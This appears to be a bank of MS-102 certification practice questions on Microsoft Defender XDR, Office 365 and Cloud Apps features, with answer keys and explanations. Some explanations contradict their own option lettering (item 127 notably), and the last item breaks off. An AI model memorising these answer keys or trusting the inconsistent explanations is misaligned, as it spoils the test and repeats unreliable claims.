DeviceNetworkEvents is the correct table because it records each network connection initiated or received on a device, including actionable fields such as RemoteIP, RemotePort, Protocol, LocalIP, LocalPort, and InitiatingProcessId or InitiatingProcessFileName. A custom detection rule can directly target these columns to alert on inbound or outbound traffic to suspicious IPs or ports without needing to join other tables. This is the only listed table that natively contains network-specific endpoint data suitable for detecting network-based threats.

Why this answer

The DeviceNetworkEvents table in Microsoft Defender XDR captures network connection events, including source and destination IP addresses, ports, and the initiating process's filename and ID. This makes it the ideal primary data source for a custom detection rule that must trigger on a specific malicious IP and port combination while also providing process information.

Exam trap

The trap here is that candidates often confuse DeviceProcessEvents (which includes process command lines) as sufficient for network detection, overlooking that it lacks the network-specific fields (RemoteIP, RemotePort) required to match a malicious IP and port combination.

How to eliminate wrong answers

Option B (DeviceProcessEvents) is wrong because it logs process creation and termination events, not network connections; it lacks the destination IP and port fields needed for this rule. Option C (DeviceFileEvents) is wrong because it tracks file creation, modification, and deletion events, which are irrelevant to network connections. Option D (IdentityLogonEvents) is wrong because it captures authentication and logon events from Azure AD, not network-level activities on devices.

124
MCQeasy

You are a security administrator for a company that uses Microsoft Defender XDR. You need to investigate a suspicious email that was reported by a user. You want to see the full email details, including headers, attachments, and URLs. Where should you look?

A.Use the Threat analytics dashboard to find the email.
B.Go to the user entity page and view their email activity.
C.In the Microsoft Defender XDR portal, search for the email message ID or subject to open the email entity page.
D.Open the incident related to the email and view the alert details.
AnswerC

The email entity page in the Microsoft Defender XDR portal consolidates the full message, including headers, attachments and URLs, retrievable by message ID or subject. This gives the investigator the complete artefact set needed to assess the reported suspicious email.

Why this answer

The email entity page in the Microsoft Defender XDR portal allows you to search by message ID or subject to view full email details including headers, attachments, and URLs. Option A is incorrect because the Threat analytics dashboard provides information about threats and attack patterns, not individual email details. Option B is incorrect because the user entity page shows user activity and alerts, not email details.

Option D is incorrect because incident details provide alerts and evidence, but not the full email entity with headers and attachments.

125
MCQhard

You create a custom detection rule in Microsoft Defender XDR using the KQL query shown in the exhibit. The rule is intended to detect lateral movement via SMB. After deploying the rule, you notice that it generates many false positives from legitimate administrative activity. What is the most effective way to reduce false positives?

A.Filter for only inbound SMB connections
B.Remove the join with DeviceProcessEvents
C.Add a filter to exclude specific administrative accounts or IP ranges
D.Increase the time window of the query
AnswerC

Adding a filter to exclude specific administrative accounts or IP ranges is a targeted false-positive reduction technique that preserves the detection logic while eliminating known, legitimate activity. For example, a SecOps team might suppress alerts from their jump-box IPs or privileged service accounts that routinely perform SMB admin tasks, so the rule only fires on anomalies. However, exclusions must be kept narrow and periodically reviewed, or attackers could abuse a broad allowlist to evade detection.

Why this answer

Adding a filter to exclude specific administrative accounts or IP ranges is the most effective way to reduce false positives from legitimate administrative activity. Since the rule detects lateral movement via SMB, legitimate admins may perform similar actions. By excluding known admin accounts or trusted IP ranges, you can suppress alerts for benign activity while still detecting malicious lateral movement.

Exam trap

MS-102 often tests tuning of detection rules, and candidates may think that simply removing joins or changing time windows will reduce false positives. The trap is to overlook that targeted exclusions based on administrative context are the most effective and precise method.

How to eliminate wrong answers

Option A is wrong because filtering for only inbound SMB connections may not address the root cause; lateral movement can involve both inbound and outbound connections, and the false positives may still occur. Option B is wrong because removing the join with DeviceProcessEvents could reduce context and potentially miss correlated events, but it does not specifically target the false positives from administrative activity. Option D is wrong because increasing the time window may capture more events and potentially increase false positives, not reduce them.

126
MCQeasy

Your organization uses Microsoft Defender for Endpoint (MDE). A security analyst needs to investigate a file that was detected as malicious on several devices. The analyst wants to see the file's prevalence across the organization and other related events. Which feature in MDE should the analyst use?

A.File page
B.Alert page
C.Device page
D.Investigation page
AnswerA

The File page in Microsoft Defender for Endpoint is the authoritative location for examining a specific file's organizational footprint. It displays aggregated data on file prevalence across all onboarded devices, identifies every device where the file has been observed, and lists related events and alerts, enabling an analyst to assess the scope of a potential threat and investigate associated activity.

Why this answer

The File page in Microsoft Defender for Endpoint provides a comprehensive view of a specific file, including its prevalence across the organization, a list of devices where it was observed, and related events such as alerts and detections. This allows the security analyst to investigate the file's spread and associated incidents in one centralized location.

Exam trap

The trap here is that candidates often confuse the File page with the Alert page, thinking that alerts are the primary source for file prevalence data, but the File page is specifically designed to show file-level telemetry across the organization, not just alert-triggered events.

How to eliminate wrong answers

Option B (Alert page) is wrong because the Alert page focuses on a specific security incident or alert, not on the file's prevalence across multiple devices or related events. Option C (Device page) is wrong because the Device page shows details about a single device, such as its alerts and software inventory, but does not aggregate file prevalence across the organization. Option D (Investigation page) is wrong because the Investigation page is used for advanced hunting queries and manual investigations, not for a pre-built summary of a file's prevalence and related events.

127
MCQhard

Your organization uses Microsoft Defender for Endpoint (Plan 2) and Microsoft Defender for Identity. A security analyst reports that several domain controllers are generating alerts for anomalous logon activity. You need to investigate the scope of the potential compromise across the entire environment, including endpoints, identities, and cloud apps. What is the most efficient approach?

A.Check each workload portal individually and correlate manually
B.Review the alerts in Microsoft Defender for Identity only
C.Review the alerts in Microsoft Defender for Endpoint only
D.Use the Microsoft Defender XDR portal to view the unified incident
AnswerD

Use the Microsoft Defender XDR portal (formerly Microsoft 365 Defender) to view the unified incident, which automatically correlates alerts from all workloads—endpoint, identity, email, and cloud apps—into a single incident with an attack story. This portal provides affected assets, related alerts, evidence, and automated investigation timelines, allowing analysts to see the entire attack chain in one place. It also supports incident management actions such as commenting, assigning, and running automated responses across the integrated workloads.

Why this answer

Microsoft Defender XDR provides a unified incident view that correlates alerts from all workloads. Option A is wrong because checking only endpoints misses identity and cloud app alerts. Option B is wrong because checking only identities misses endpoints.

Option C is wrong because using multiple portals is inefficient.

128
MCQmedium

Your organization uses Microsoft Defender XDR and Microsoft 365 E5 licenses. You need to ensure that when a user is determined to be compromised (e.g., due to a leaked credential), all active sessions are terminated and the user is required to re-authenticate with multi-factor authentication (MFA). You want to automate this process as much as possible. What should you do?

A.In Microsoft Defender for Cloud Apps, create a session policy with the 'Suspend user' governance action and configure it to revoke sessions and require re-authentication.
B.Disable the user account in Microsoft Entra ID.
C.Create a conditional access policy that requires MFA for all users.
D.Manually reset the user's password and sign out of all sessions.
AnswerA

Correct: Automatically terminates sessions and forces MFA re-authentication.

Why this answer

Microsoft Defender for Cloud Apps can create a session policy with the 'Suspend user' governance action, which integrates with Microsoft Entra ID to revoke all active sessions and require the user to re-authenticate with MFA. This automates the process of terminating sessions and enforcing re-authentication when a user is compromised. Option B is incorrect because disabling the user account terminates sessions but does not require MFA re-authentication for future access.

Option C is incorrect because a conditional access policy requiring MFA for all users does not terminate existing sessions; it only applies to new authentication requests. Option D is incorrect because manually resetting the password and signing out of sessions is not automated and does not leverage the capabilities of Microsoft Defender XDR and Microsoft 365 E5 licenses.

Exam trap

Candidates may confuse conditional access policies with session governance actions. Conditional access policies are evaluated at the time of sign-in and do not terminate existing sessions. MDCA's session policies, such as 'Suspend user', can enforce actions that revoke active sessions and prompt re-authentication.

129
MCQmedium

A security administrator wants to automatically isolate a device in Microsoft Defender for Endpoint whenever a high-severity alert is triggered. The isolation should occur without manual intervention. Which Microsoft Defender XDR feature should be configured?

A.Attack surface reduction rules
B.Automated investigation and response
C.Threat analytics
D.Vulnerability management
AnswerB

Automated investigation and response applies remediation actions automatically once a high-severity alert fires, so isolation occurs with no analyst involvement. This satisfies the stem's no-manual-intervention constraint, unlike custom detections or alert tuning, which identify or refine alerts but do not execute containment themselves.

Why this answer

Automated Investigation and Response (AIR) in Microsoft Defender XDR is designed to automatically respond to threats by running playbooks that can take remediation actions, such as isolating a device, without manual intervention. When a high-severity alert triggers, AIR evaluates the alert and, if configured, executes the isolation action as part of its automated response, meeting the requirement for zero-touch isolation.

Exam trap

The trap here is that candidates often confuse proactive prevention features (like ASR rules) with automated post-breach response capabilities, assuming any security feature that 'blocks' something can also isolate a device automatically.

How to eliminate wrong answers

Option A is wrong because Attack Surface Reduction (ASR) rules are proactive policies that block specific behaviors (e.g., Office apps creating child processes) but do not perform post-breach automated isolation actions. Option C is wrong because Threat Analytics provides intelligence reports on active threats and vulnerabilities but does not execute any automated remediation or device isolation. Option D is wrong because Vulnerability Management identifies and prioritizes software vulnerabilities but lacks the capability to automatically isolate a device in response to an alert.

130
MCQmedium

You are a security administrator for a company that uses Microsoft Defender XDR. You need to ensure that when a user clicks a malicious link in an email, the URL is automatically blocked and the user is prevented from accessing the site. Which Microsoft Defender XDR component should you configure?

A.Microsoft Defender for Endpoint web content filtering
B.Microsoft Defender for Cloud Apps conditional access app control
C.Microsoft Defender for Identity sign-in alerts
D.Microsoft Defender for Office 365 Safe Links policy
AnswerD

Safe Links in Microsoft Defender for Office 365 scans URLs in emails and documents, and blocks access to malicious sites at time of click. Configuring a Safe Links policy ensures that when a user clicks a malicious link, they are prevented from accessing the site, meeting the requirement.

Why this answer

Safe Links in Microsoft Defender for Office 365 is specifically designed to protect users from malicious URLs in emails and documents by scanning and blocking access at click time. Configuring a Safe Links policy ensures that users are prevented from accessing malicious sites when they click links.

Exam trap

The trap here is assuming that web content filtering or Conditional Access App Control can block email links, but they operate at different layers and do not scan email URLs.

131
MCQeasy

Your organization uses Microsoft Defender for Office 365. You need to ensure that emails containing malicious attachments are automatically removed from users' inboxes after detection. What should you configure?

A.Configure a Safe Links policy
B.Configure an anti-spam policy to delete the email
C.Configure a Safe Attachments policy
D.Use the attack simulation training to report the email
AnswerC

Safe Attachments detonates attachments in a sandbox and, when malware is detected, removes or replaces the message, satisfying the requirement for automatic post-detection removal from inboxes. Safe Links only rewrites URLs at click time, so it cannot remove malicious attachments already delivered.

Why this answer

Configure a Safe Attachments policy. Safe Attachments policies in Defender for Office 365 automatically scan email attachments for malicious content and can remove or quarantine emails with detected malware. Option A (Safe Links) protects against malicious URLs, not attachments.

Option B (anti-spam policy) handles spam, not malware in attachments. Option D (attack simulation training) is for phishing simulations, not automatic removal of malicious attachments.

132
MCQhard

A security analyst is using Microsoft 365 Defender Advanced Hunting to investigate a potential malware outbreak. The analyst needs to find all devices where a specific signed executable (known to be malicious) was created in the past 24 hours. Which Advanced Hunting table should be queried to detect the creation of the executable file?

A.DeviceFileEvents
B.DeviceProcessEvents
C.DeviceNetworkEvents
D.DeviceRegistryEvents
AnswerA

DeviceFileEvents is the correct table in Microsoft 365 Defender's advanced hunting schema for this scenario because it records file creation, modification, rename, and deletion events. Its columns include FileName, FolderPath, and Timestamp, allowing you to search for the malicious executable by its exact name and location on disk. Process, network, and registry tables do not provide this file-system telemetry.

Why this answer

The DeviceFileEvents table in Microsoft 365 Defender Advanced Hunting captures file creation, modification, and deletion events. Since the question specifically asks for detecting the creation of a signed executable file, this table provides the necessary data, including file name, path, and timestamp, to identify when and where the malicious executable was created.

Exam trap

The trap here is that candidates often confuse file creation with process execution, mistakenly selecting DeviceProcessEvents because they think of the executable running, but the question explicitly asks for the creation event, which is only captured in DeviceFileEvents.

How to eliminate wrong answers

Option B is wrong because DeviceProcessEvents logs process creation and execution events, not file creation; it would show the executable running but not its initial creation. Option C is wrong because DeviceNetworkEvents records network connections and communications, which are unrelated to local file creation. Option D is wrong because DeviceRegistryEvents tracks registry key modifications, not file system operations like file creation.

133
MCQeasy

You are a security administrator. You need to ensure that email messages containing malicious attachments are automatically removed from all mailboxes in your organization after delivery. Which Microsoft Defender for Office 365 feature should you configure?

A.Safe Links
B.Zero-hour auto purge (ZAP)
C.Anti-phishing
D.Safe Attachments
AnswerB

Zero-hour auto purge retroactively removes delivered messages after Microsoft's detonation verdicts reclassify them as malicious, satisfying the requirement to delete threats post-delivery across all mailboxes. Unlike transport rules, which act only in transit, ZAP operates inside mailboxes, so it catches messages already sitting in inboxes when signatures update.

Why this answer

Zero-hour auto purge (ZAP) is the Defender for Office 365 feature that retroactively removes malicious messages from Exchange Online mailboxes after delivery. It works with Safe Attachments and Safe Links to detect threats post-delivery and automatically purge them, which is exactly what the administrator needs.

Exam trap

MS-102 often tests the confusion between Safe Attachments (detonation at delivery) and ZAP (retroactive purge after delivery) — candidates pick Safe Attachments when the question specifies 'after delivery.'

How to eliminate wrong answers

Option A is wrong because Safe Links rewrites and checks URLs at click time to block malicious links — it does not remove email messages containing malicious attachments from mailboxes. Option C is wrong because Anti-phishing policies detect and act on phishing emails at delivery time (or via impersonation protection), but they do not retroactively purge already-delivered messages. Option D is wrong because Safe Attachments detonates attachments in a sandbox to detect malware, but by itself it blocks or replaces the attachment at delivery; it is ZAP that performs the post-delivery purge of the entire message.

134
MCQmedium

Refer to the exhibit. You are configuring a session policy in Microsoft Defender for Cloud Apps. The policy must block downloads when both the app risk is high and the user risk is high. Based on the exhibit, which additional condition should you add to ensure the policy only applies to unsanctioned apps?

A.Add a condition for app risk score to be medium or low.
B.Add a condition for user risk score to be medium.
C.Add a condition for activity to include upload.
D.Add a condition for app tag to be 'unsanctioned'.
AnswerD

Adding a condition for app tag to be 'unsanctioned' explicitly scopes the session policy to only those applications that are marked as unsanctioned in the app catalog. This is the precise way to limit the policy's effect, because app tags are designed for this classification. It ensures that the existing download-blocking rule applies only to unsanctioned apps, fulfilling the stated requirement.

Why this answer

In Microsoft Defender for Cloud Apps session policies, to restrict the policy to unsanctioned apps, you must add a condition on the app tag. Unsanctioned apps are those that have been marked as unsanctioned in Cloud App Catalog. The condition 'app tag equals unsanctioned' ensures the policy only applies to those apps.

The other conditions (app risk score, user risk score, activity) do not filter by sanction status.

Exam trap

The trap is assuming that app risk score correlates with sanction status; candidates might choose app risk score instead of app tag, but they are independent attributes.

How to eliminate wrong answers

Option A is wrong because app risk score is a separate attribute from sanction status; an app can be high risk but sanctioned, or low risk but unsanctioned. Option B is wrong because user risk score is about the user, not the app's sanction status. Option C is wrong because activity type (upload/download) is about the action, not the app's sanction status.

135
MCQmedium

An administrator wants to configure automated investigation and response (AIR) in Microsoft 365 Defender so that when a high-severity malware alert is generated for a device from Microsoft Defender for Endpoint, the device is automatically isolated from the network without requiring a security analyst to approve the action. Which configuration step is required?

A.Set the automation level for device isolation to 'Semi - require approval for any remediation'
B.Set the automation level for device isolation to 'Full - remediate threats automatically'
C.Create a custom detection rule that automatically isolates the device
D.Enable 'Automated device isolation' in the Microsoft 365 Defender settings
AnswerB

Setting the automation level to 'Full - remediate threats automatically' lets Microsoft 365 Defender execute remediation actions such as device isolation without analyst approval. This satisfies the stem's requirement that isolation occur automatically when a high-severity malware alert is raised.

Why this answer

Setting the automation level for device isolation to 'Full - remediate threats automatically' in Microsoft Defender for Endpoint's automated investigation and response (AIR) configuration allows the system to automatically isolate a device when a high-severity malware alert is triggered, without requiring analyst approval. This automation level is specifically designed to execute remediation actions like device isolation immediately based on the alert's severity and the device's risk level.

Exam trap

The trap here is that candidates often confuse the 'Full' automation level with requiring approval for all actions, or they mistakenly think a separate toggle like 'Automated device isolation' exists, when in fact the automation level controls all remediation actions including isolation.

How to eliminate wrong answers

Option A is wrong because 'Semi - require approval for any remediation' means that any remediation action, including device isolation, will wait for a security analyst to manually approve it, which contradicts the requirement for automatic isolation without approval. Option C is wrong because creating a custom detection rule is not the standard or recommended method for configuring automated device isolation; AIR automation levels are the native mechanism to control automatic remediation actions. Option D is wrong because 'Automated device isolation' is not a standalone setting in Microsoft 365 Defender; the correct configuration is done through the automation level settings within the device group's AIR policies.

136
MCQmedium

Your organization uses Microsoft Defender for Office 365 and Microsoft Defender for Cloud Apps. A user reports receiving a suspicious email with a link to a known phishing site. You need to prevent other users from clicking similar links in the future. What should you configure?

A.Use the attack simulation training to educate users
B.Create a Safe Attachments policy to block the attachment
C.Configure a spam filter policy to block the sender
D.Add the URL to the Tenant Allow/Block List in Microsoft 365 Defender
AnswerD

Tenant Allow/Block List entries for URLs are enforced by Defender for Office 365 at time-of-click, blocking the phishing link for every user in the tenant. This satisfies the requirement to stop others clicking similar links, unlike user-level junk or transport rules.

Why this answer

The Tenant Allow/Block List in Microsoft 365 Defender allows you to block specific URLs across the organization, preventing users from accessing known phishing sites. Option A is incorrect because attack simulation training is for user education, not blocking links. Option B is incorrect because Safe Attachments policies only handle email attachments, not URLs.

Option C is incorrect because spam filter policies manage spam classification, not specific URLs.

137
MCQmedium

A security administrator wants to automatically block a file that is detected as malware on one endpoint from being executed on all other endpoints in the organization. Which Microsoft Defender for Endpoint capability provides this?

A.Attack surface reduction rules
B.Network protection
C.Tamper protection
D.Automated investigation and remediation
AnswerD

Automated investigation and remediation (AIR) in Microsoft Defender for Endpoint directly matches the requirement: when malware is detected on one device, AIR automatically performs an investigation, and then can take response actions including blocking the file's hash and containing the threat across the entire organization. By leveraging cloud-based intelligence, AIR can propagate the block to all endpoints before the malware has a chance to spread or re-enter. This is the only option that provides a post-detection, automated, organization-wide file-blocking capability.

Why this answer

Automated investigation and remediation (AIR) in Microsoft Defender for Endpoint is designed to automatically respond to detected threats by containing or blocking malicious files across the organization. When malware is detected on one endpoint, AIR can trigger a remediation action (e.g., blocking the file hash) that is propagated to all other endpoints via the Microsoft Defender security center, preventing execution elsewhere.

Exam trap

The trap here is that candidates often confuse automated investigation and remediation with proactive controls like attack surface reduction rules, but AIR is specifically the reactive, automated response capability that can block a detected file across all endpoints.

How to eliminate wrong answers

Option A is wrong because attack surface reduction rules are proactive policies that reduce exploit entry points (e.g., blocking Office apps from creating child processes), not a reactive mechanism to block a file already detected as malware across endpoints. Option B is wrong because network protection blocks outbound connections to malicious IPs/domains using the Windows Filtering Platform, not the execution of a specific file hash on endpoints. Option C is wrong because tamper protection prevents unauthorized changes to security settings (e.g., disabling real-time protection), but does not automatically block a detected malware file from running on other machines.

138
MCQeasy

Your organization is a small business with 200 users. You use Microsoft 365 Business Premium, which includes Microsoft Defender for Business (the small business version of Defender for Endpoint) and Microsoft Defender for Office 365 Plan 1. You want to protect against ransomware by blocking malicious processes and behaviors on endpoints. You also need to enable automated investigation and response for common threats. However, your IT team has limited security expertise and wants a simple configuration that provides out-of-the-box protection without custom policies. What should you do?

A.Configure Safe Attachments policies in Microsoft Defender for Office 365 to block ransomware attachments.
B.Enable the default security baseline in Microsoft Defender for Business, which includes attack surface reduction rules and automated investigation.
C.Create custom attack surface reduction rules in Microsoft Defender for Business to block ransomware behaviors.
D.Deploy a third-party endpoint detection and response (EDR) solution alongside Microsoft Defender for Business.
AnswerB

Enabling the default security baseline in Microsoft Defender for Business provides a preset collection of endpoint protection settings, including attack surface reduction rules, real-time antivirus, tamper protection, and automated investigation and remediation. This baseline is curated by Microsoft to balance security with usability, making it ideal for small businesses that lack dedicated security staff. It directly addresses ransomware behaviors by blocking common exploit techniques and automatically responding to alerts without manual configuration.

Why this answer

Microsoft Defender for Business includes a default security baseline that turns on recommended attack surface reduction (ASR) rules, next-generation antivirus, and automated investigation and response (AIR) out of the box. For a 200-user shop with limited security expertise, enabling this baseline delivers ransomware-blocking behavior rules and automated remediation without requiring custom policy authoring. This matches the requirement for simple, out-of-the-box protection.

Exam trap

MS-102 often tests the difference between email-layer protection (Safe Attachments) and endpoint behavior blocking (ASR/AIR) — candidates pick Safe Attachments because 'ransomware' appears in email, but the question specifies blocking malicious processes on endpoints.

How to eliminate wrong answers

Option A is wrong because Safe Attachments in Defender for Office 365 Plan 1 protects against malicious email attachments, not endpoint process behaviors — it does not block ransomware execution on endpoints, which is the stated requirement. Option C is wrong because creating custom ASR rules requires security expertise to tune rule IDs, exclusions, and audit-vs-block modes, contradicting the 'limited expertise, simple configuration' constraint; the default baseline already includes recommended ASR rules. Option D is wrong because deploying a third-party EDR alongside Defender for Business adds cost, complexity, and potential agent conflicts, and is unnecessary since Defender for Business already provides EDR and AIR capabilities.

139
MCQmedium

A security analyst wants to create a custom detection rule in Microsoft Defender XDR that triggers when a user receives a phishing email and clicks a link to a known malicious domain. Which advanced hunting table should the analyst query to track the clicked URL?

A.EmailEvents
B.EmailUrlInfo
C.EmailAttachmentInfo
D.DeviceEvents
AnswerB

This table is the authoritative source in the email schema for URL information, including the original URL, domain, and the disposition (e.g., clicked, not clicked) associated with links in emails. It's directly structured for link-level analysis and is the correct starting point when building a custom detection for clicked URLs. You can join it with EmailEvents on NetworkMessageId to correlate click events with the email's delivery and recipient.

Why this answer

The EmailUrlInfo table in Advanced Hunting for Microsoft Defender XDR contains records of URLs that were present in emails, including the URL domain and whether the link was clicked. By joining EmailEvents with EmailUrlInfo on the NetworkMessageId, the analyst can identify when a user clicked a URL that leads to a known malicious domain, making it the correct table for tracking clicked URLs.

Exam trap

The trap here is that candidates often confuse EmailUrlInfo (which stores URL metadata and supports click tracking) with EmailEvents (which only contains email flow data), leading them to incorrectly select EmailEvents as the primary table for URL click analysis.

How to eliminate wrong answers

Option A is wrong because EmailEvents captures metadata about email delivery events (e.g., sender, recipient, delivery action) but does not include the specific URLs contained in the email or click actions. Option C is wrong because EmailAttachmentInfo tracks file attachments in emails, not URLs or link clicks. Option D is wrong because DeviceEvents logs system-level events on endpoints (e.g., process creation, registry changes) and does not contain email URL click data.

140
MCQeasy

An organization wants to prevent users from running executable files from the Windows Temp folder. Which Microsoft Defender for Endpoint capability should be configured?

A.Attack surface reduction rules
B.Network protection
C.Exploit protection
D.Controlled folder access
AnswerA

Attack surface reduction (ASR) rules are a Windows Defender Exploit Guard capability that can specifically block process creation from common temporary folders (such as %Temp% and %AppData%) using a predefined rule like 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' or the explicit temp-folder rule, preventing malware from launching from file paths where droppers commonly execute. ASR rules are client-side, configured via Microsoft Intune, Configuration Manager, or GPO, and operate before the executable is allowed to spawn by intercepting process creation in the kernel and user-mode. This makes ASR the correct choice because it directly restricts executable execution based on file location and reputation, rather than merely restricting network or data access.

Why this answer

Attack surface reduction (ASR) rules are a Microsoft Defender for Endpoint capability that can block executable files from running from specific locations, such as the Windows Temp folder. Rule GUID 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 specifically targets this behavior by preventing executables and scripts from launching from temporary folders. This is the correct capability because ASR rules are designed to reduce the attack surface by controlling common malware entry points and persistence mechanisms.

Exam trap

The trap here is that candidates often confuse Controlled folder access (which protects files from modification) with execution control, or they mistakenly think Network protection can block local file execution because it sounds like a broad security measure.

How to eliminate wrong answers

Option B (Network protection) is wrong because it prevents users from accessing malicious websites or IP addresses, not from running local executable files from a folder. Option C (Exploit protection) is wrong because it applies mitigations to system processes and applications to prevent exploitation of vulnerabilities, such as heap spray or code injection, not to block execution from a specific folder path. Option D (Controlled folder access) is wrong because it protects folders from unauthorized changes by untrusted applications, such as ransomware encryption, but does not block the execution of executables from the Temp folder.

141
MCQhard

Your organization uses Microsoft Defender for Endpoint (Plan 2) and Microsoft Defender for Identity. A user reports that their device is running slowly and exhibiting unusual network traffic. You investigate in Microsoft Defender XDR and see a high number of alerts for the device. You need to determine if the device is compromised and, if so, initiate an automated investigation. What should you do first?

A.Isolate the device from the network immediately
B.Initiate a Live Response session to gather forensic data
C.Use the Microsoft Defender XDR portal to trigger an automated investigation on the device
D.Run a full antivirus scan from Microsoft Defender Antivirus
AnswerC

Triggering automated investigation from the Microsoft Defender XDR portal initiates the built-in response workflow, gathering evidence and applying remediation actions across the device. This directly addresses the requirement to determine compromise and start automated investigation.

Why this answer

Using the Microsoft Defender XDR portal to trigger an automated investigation leverages the full XDR capabilities to analyze the device and determine if it is compromised. Option A is incorrect because isolating the device is a containment action, not the first step to determine compromise. Option B is incorrect because Live Response is a manual forensic tool, not an automated investigation.

Option D is incorrect because running a full antivirus scan is not an automated investigation and may not detect advanced threats.

142
MCQhard

Refer to the exhibit. You run the KQL query and see that a device named 'WORKSTATION42' has made 1500 connections to a public IP address 203.0.113.55 in the last day. You suspect the device may be compromised. What should you do next to gain the most context?

A.Isolate the device immediately using Microsoft Defender for Endpoint
B.Expand the query to join with DeviceProcessEvents to see which process initiated the connections
C.Add the IP address to the Tenant Allow/Block List to block it
D.Create a Safe Links policy to block the IP address
AnswerB

Expanding the Advanced Hunting query with a join to DeviceProcessEvents is the correct next step because it lets you identify which executable initiated each connection. DeviceNetworkEvents already records InitiatingProcessId, but combining it with DeviceProcessEvents using DeviceId, Timestamp, and ProcessId enables you to see the full process details, command-line arguments, and parent process. This tells you whether the traffic is from a known legitimate application or an unknown/malicious process, giving you a foundation for a reasoned containment decision.

Why this answer

Expanding the query to join with DeviceProcessEvents will provide context on which process initiated the connections, helping determine if the activity is malicious or benign. This is the next logical step in an investigation before taking containment actions.

Exam trap

Candidates may jump to containment (isolate) or blocking, but the question asks for the next step to gain context, so investigation via additional queries is correct.

How to eliminate wrong answers

Option A is wrong because isolating the device immediately is a containment action that should be taken after sufficient evidence, not as a first step to gain context. Option C is wrong because adding the IP to the Tenant Allow/Block List is a mitigation that may be premature without understanding the process. Option D is wrong because Safe Links policies are for email URL protection, not for blocking IP addresses from endpoint connections.

143
MCQeasy

Your organization uses Microsoft Defender for Cloud Apps. You need to generate alerts when a user downloads more than 100 files from SharePoint Online within 10 minutes. What should you configure?

A.Create an activity policy
B.Create an app discovery policy
C.Create a session policy
D.Create an OAuth app policy
AnswerA

Activity policies in Microsoft Defender for Cloud Apps evaluate user actions against thresholds and generate alerts or governance actions. Configuring one with a file-download criterion and a 100-file count within a 10-minute window detects the mass-download behaviour.

Why this answer

Activity policies in Microsoft Defender for Cloud Apps are designed to monitor user activities across connected apps and generate alerts when specific conditions are met, such as a user downloading more than 100 files from SharePoint Online within 10 minutes. This is a classic anomaly detection scenario that activity policies handle natively. The other policy types serve different purposes: app discovery for shadow IT, session policies for conditional access, and OAuth app policies for app permissions.

Exam trap

MS-102 often tests the confusion between activity policies (monitor user actions) and session policies (control access in real-time); candidates may pick session policy thinking it can alert on download volume, but session policies are for inline enforcement, not threshold-based alerting.

How to eliminate wrong answers

Option B is wrong because app discovery policies are used to identify unsanctioned cloud apps (shadow IT) based on traffic logs, not to monitor user file download activity. Option C is wrong because session policies control real-time session behavior (e.g., block download, require step-up authentication) but do not generate alerts based on activity thresholds. Option D is wrong because OAuth app policies govern the permissions and access of OAuth applications, not user activity patterns.

144
MCQhard

A security administrator wants to block executable files from running from writable system directories such as %TEMP% and %APPDATA% on Windows devices. Which attack surface reduction (ASR) rule should be enabled?

A.Block executable files from running unless they meet a prevalence, age, or trusted list criterion.
B.Block Office communication application from creating child processes.
C.Block credential stealing from the Windows local security authority subsystem (lsass.exe).
D.Block executable content from email client and webmail.
AnswerA

This is the correct Attack Surface Reduction (ASR) rule, GUID 01443614-cd74-433a-b99e-2ecdc07bfc25, which blocks executables that lack sufficient prevalence, age, or a trusted-list entry. It leverages cloud-delivered reputation checks and admin-defined trusted files to stop unknown binaries that commonly execute from writable system directories such as %TEMP%, %APPDATA%, and C:\Users\Public, where persistence mechanisms are often planted. This directly enforces the requirement to block executable files from running from writable system locations while still allowing known legitimate software.

Why this answer

The ASR rule 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25) is designed specifically to block executables (e.g., .exe, .dll, .scr) from running from writable locations like %TEMP% and %APPDATA% unless they have sufficient global prevalence, are older than a certain age, or are on a trusted list. This directly addresses the administrator's requirement to prevent untrusted executables from executing from these directories.

Exam trap

The trap here is that candidates often confuse the 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' rule with the 'Block executable content from email client and webmail' rule, mistakenly thinking the latter covers all executable execution from writable directories when it only applies to email/webmail sources.

How to eliminate wrong answers

Option B is wrong because 'Block Office communication application from creating child processes' targets Microsoft Office communication apps (e.g., Outlook, Teams) from spawning child processes, which is a different attack vector (e.g., script-based attacks), not executable files from writable directories. Option C is wrong because 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)' specifically protects LSASS from credential dumping via tools like Mimikatz, not from executables running in %TEMP% or %APPDATA%. Option D is wrong because 'Block executable content from email client and webmail' prevents executable attachments from being launched from email clients (e.g., Outlook, Gmail), which is a different entry point than local writable system directories.

145
Multi-Selecteasy

A company is deploying Microsoft Defender for Office 365 to protect against advanced threats. Which two features are available only in Defender for Office 365 Plan 2 and not in Plan 1? (Choose two.)

Select 2 answers
A.Automated Investigation & Response
B.Anti-phishing
C.Safe Attachments
D.Safe Links
E.Threat Explorer
AnswersA, E

Automated Investigation and Response orchestrates multi-stage remediation across mailboxes, triggered automatically when alerts fire. It is licensed exclusively with Defender for Office 365 Plan 2; Plan 1 provides only manual investigation and basic alerting, so this feature satisfies the Plan 2-only constraint.

Why this answer

Options A and E are correct. Automated Investigation & Response (AIR) and Threat Explorer are only available in Defender for Office 365 Plan 2. Anti-phishing, Safe Attachments, and Safe Links are available in both Plan 1 and Plan 2.

146
MCQhard

A security analyst needs to create a custom detection rule in Microsoft 365 Defender that triggers when a suspicious PowerShell process (e.g., using -EncodedCommand) is detected on a device, and within 5 minutes, an outbound network connection to a known malicious IP address occurs. Which two advanced hunting tables must be joined?

A.DeviceProcessEvents and DeviceNetworkEvents
B.DeviceEvents and DeviceFileCertificateInfo
C.IdentityLogonEvents and CloudAppEvents
D.EmailEvents and EmailAttachmentInfo
AnswerA

DeviceProcessEvents records the creation of processes with full command-line arguments, capturing activities such as launching PowerShell or other executables. DeviceNetworkEvents logs network connections to remote endpoints, including destination IPs and ports. By joining these tables on DeviceId within a time window, an analyst can identify a specific process making an outbound connection, which is exactly the pattern needed for this custom detection.

Why this answer

The custom detection rule requires correlating a suspicious PowerShell process event with a subsequent outbound network connection to a malicious IP within a 5-minute window. DeviceProcessEvents contains process creation data (e.g., command line, process name) for detecting encoded PowerShell commands, while DeviceNetworkEvents logs network connections (destination IP, port, protocol). Joining these two tables on DeviceId and a time range allows the rule to identify the sequence of a process event followed by a network event from the same device.

Exam trap

The trap here is that candidates may confuse the purpose of DeviceEvents (which covers broader system events like driver loads or registry changes) with DeviceProcessEvents, or mistakenly think cloud or email tables are relevant to endpoint-based process and network correlation.

How to eliminate wrong answers

